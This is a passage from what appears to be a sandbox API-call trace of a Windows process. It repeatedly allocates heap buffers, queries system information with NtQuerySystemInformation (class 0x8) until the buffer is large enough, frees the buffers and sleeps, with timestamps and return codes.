SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.318] Sleep (dwMilliseconds=0x110) [0209.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.328] Sleep (dwMilliseconds=0x110) [0209.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.346] Sleep (dwMilliseconds=0x110) [0209.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.363] Sleep (dwMilliseconds=0x110) [0209.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.380] Sleep (dwMilliseconds=0x110) [0209.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.411] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.413] Sleep (dwMilliseconds=0x110) [0209.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.439] Sleep (dwMilliseconds=0x110) [0209.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.459] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.459] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.462] Sleep (dwMilliseconds=0x110) [0209.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.472] Sleep (dwMilliseconds=0x110) [0209.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.493] Sleep (dwMilliseconds=0x110) [0209.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.505] Sleep (dwMilliseconds=0x110) [0209.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.516] Sleep (dwMilliseconds=0x110) [0209.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.537] Sleep (dwMilliseconds=0x110) [0209.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.553] Sleep (dwMilliseconds=0x110) [0209.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.565] HeapFree (in: 